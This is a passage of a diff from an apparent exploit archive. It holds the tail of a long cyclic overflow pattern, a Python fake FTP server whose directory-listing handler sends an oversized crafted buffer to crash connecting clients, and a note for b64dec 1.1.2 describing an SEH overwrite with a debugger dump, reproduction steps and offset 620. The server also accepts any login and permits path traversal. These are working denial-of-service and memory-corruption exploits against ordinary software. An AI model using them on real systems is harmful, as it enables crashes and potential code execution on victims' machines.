8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M" + + +class FTPserverThread(threading.Thread): + def __init__(self,(conn,addr)): + self.conn=conn + self.addr=addr + self.basewd=currdir + self.cwd=self.basewd + self.rest=False + self.pasv_mode=False + threading.Thread.__init__(self) + + def run(self): + self.conn.send('220 Welcome!\r\n') + while True: + cmd=self.conn.recv(256) + if not cmd: break + else: + print 'Recieved:',cmd + try: + func=getattr(self,cmd[:4].strip().upper()) + func(cmd) + except Exception,e: + print 'ERROR:',e + #traceback.print_exc() + self.conn.send('500 Sorry.\r\n') + + def SYST(self,cmd): + self.conn.send('215 UNIX Type: L8\r\n') + def OPTS(self,cmd): + if cmd[5:-2].upper()=='UTF8 ON': + self.conn.send('200 OK.\r\n') + else: + self.conn.send('451 Sorry.\r\n') + def USER(self,cmd): + self.conn.send('331 OK.\r\n') + def PASS(self,cmd): + self.conn.send('230 OK.\r\n') + #self.conn.send('530 Incorrect.\r\n') + def QUIT(self,cmd): + self.conn.send('221 Goodbye.\r\n') + def NOOP(self,cmd): + self.conn.send('200 OK.\r\n') + def TYPE(self,cmd): + self.mode=cmd[5] + self.conn.send('200 Binary mode.\r\n') + + def CDUP(self,cmd): + if not os.path.samefile(self.cwd,self.basewd): + #learn from stackoverflow + self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) + self.conn.send('200 OK.\r\n') + def PWD(self,cmd): + cwd=os.path.relpath(self.cwd,self.basewd) + if cwd=='.': + cwd='/' + else: + cwd='/'+cwd + self.conn.send('257 \"%s\"\r\n' % cwd) + def CWD(self,cmd): + chwd=cmd[4:-2] + if chwd=='/': + self.cwd=self.basewd + elif chwd[0]=='/': + self.cwd=os.path.join(self.basewd,chwd[1:]) + else: + self.cwd=os.path.join(self.cwd,chwd) + self.conn.send('250 OK.\r\n') + + def PORT(self,cmd): + if self.pasv_mode: + self.servsock.close() + self.pasv_mode = False + l=cmd[5:].split(',') + self.dataAddr='.'.join(l[:4]) + self.dataPort=(int(l[4])<<8)+int(l[5]) + self.conn.send('200 Get port.\r\n') + + def PASV(self,cmd): # from http://goo.gl/3if2U + self.pasv_mode = True + self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.servsock.bind((local_ip,0)) + self.servsock.listen(1) + ip, port = self.servsock.getsockname() + print 'open', ip, port + self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' % + (','.join(ip.split('.')), port>>8&0xFF, port&0xFF)) + + def start_datasock(self): + if self.pasv_mode: + self.datasock, addr = self.servsock.accept() + print 'connect:', addr + else: + self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.datasock.connect((self.dataAddr,self.dataPort)) + + def stop_datasock(self): + self.datasock.close() + if self.pasv_mode: + self.servsock.close() + + + def LIST(self,cmd): + self.conn.send('150 Here comes the directory listing.\r\n') + self.start_datasock() + for t in os.listdir(self.cwd): + k=self.toListItem(os.path.join(self.cwd,t)) + self.datasock.send(buff + buff + buff + '\r\n') + print "[+] Crafted packet sent . . . [+]" + #self.datasock.send(buff + buff + '\r\n') + self.stop_datasock() + self.conn.send('226 Directory send OK.\r\n') + + def toListItem(self,fn): + st=os.stat(fn) + fullmode='rwxrwxrwx' + mode='' + for i in range(9): + mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-' + d=(os.path.isdir(fn)) and 'd' or '-' + ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime)) + return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn) + + def MKD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + os.mkdir(dn) + self.conn.send('257 Directory created.\r\n') + + def RMD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + if allow_delete: + os.rmdir(dn) + self.conn.send('250 Directory deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def DELE(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + if allow_delete: + os.remove(fn) + self.conn.send('250 File deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def RNFR(self,cmd): + self.rnfn=os.path.join(self.cwd,cmd[5:-2]) + self.conn.send('350 Ready.\r\n') + + def RNTO(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + os.rename(self.rnfn,fn) + self.conn.send('250 File renamed.\r\n') + + def REST(self,cmd): + self.pos=int(cmd[5:-2]) + self.rest=True + self.conn.send('250 File position reseted.\r\n') + + def RETR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/') + print 'Downlowding:',fn + if self.mode=='I': + fi=open(fn,'rb') + else: + fi=open(fn,'r') + self.conn.send('150 Opening data connection.\r\n') + if self.rest: + fi.seek(self.pos) + self.rest=False + data= fi.read(1024) + self.start_datasock() + while data: + self.datasock.send(data) + data=fi.read(1024) + fi.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + + def STOR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + print 'Uplaoding:',fn + if self.mode=='I': + fo=open(fn,'wb') + else: + fo=open(fn,'w') + self.conn.send('150 Opening data connection.\r\n') + self.start_datasock() + while True: + data=self.datasock.recv(1024) + if not data: break + fo.write(data) + fo.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + +class FTPserver(threading.Thread): + def __init__(self): + self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.sock.bind((local_ip,local_port)) + threading.Thread.__init__(self) + + def run(self): + self.sock.listen(5) + while True: + th=FTPserverThread(self.sock.accept()) + th.daemon=True + th.start() + + def stop(self): + self.sock.close() + +if __name__=='__main__': + ftp=FTPserver() + ftp.daemon=True + ftp.start() + print 'On', local_ip, ':', local_port + raw_input('Enter to end...\n') + ftp.stop() \ No newline at end of file diff --git a/platforms/windows/dos/39070.txt b/platforms/windows/dos/39070.txt new file mode 100755 index 000000000..98180ea47 --- /dev/null +++ b/platforms/windows/dos/39070.txt @@ -0,0 +1,52 @@ +******************************************************************************************** +# Exploit: b64dec SEH OverWrite. +# Date: 12/18/2015 +# Exploit Author: Un_N0n +# Vendor: Tim Rohlfs +# Software Link: http://4mhz.de/b64dec.html +# Version: 1.1.2 +# Tested on: Windows 7 x64(64bit) +******************************************************************************************** + +[Dump] + +SEH chain of thread 00000EC0 +Address SE handler +024CFC50 b64dec.00458140 +024CFC5C b64dec.004581B3 +024CFF28 b64dec.0045847C +024CFF00 41414141 <------- +41414141 *** CORRUPT ENTRY *** <------- +---------------------------------------------------- +024CFEE4 41414141 AAAA +024CFEE8 41414141 AAAA +024CFEEC 41414141 AAAA +024CFEF0 41414141 AAAA +024CFEF4 41414141 AAAA +024CFEF8 41414141 AAAA +024CFEFC 41414141 AAAA +024CFF00 41414141 AAAA Pointer to next SEH record <----- +024CFF04 41414141 AAAA SE handler <----- +024CFF08 41414141 AAAA +024CFF0C 41414141 AAAA +024CFF10 41414141 AAAA +024CFF14 41414141 AAAA +024CFF18 41414141 AAAA + + +[How to?] +1 - Open up b64dec.exe +2 - In Search field, paste in the contents of Crash.txt +3 - Hit 'Decode' + +~ Software Crashes due to SEH Over-Write. + +[Crash.txt?] +AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD + +--------------------------------------|-----| + NSEH SEH + +[Extra Info] +Offset = 620 +******************************************************************************************** \ No newline at end of file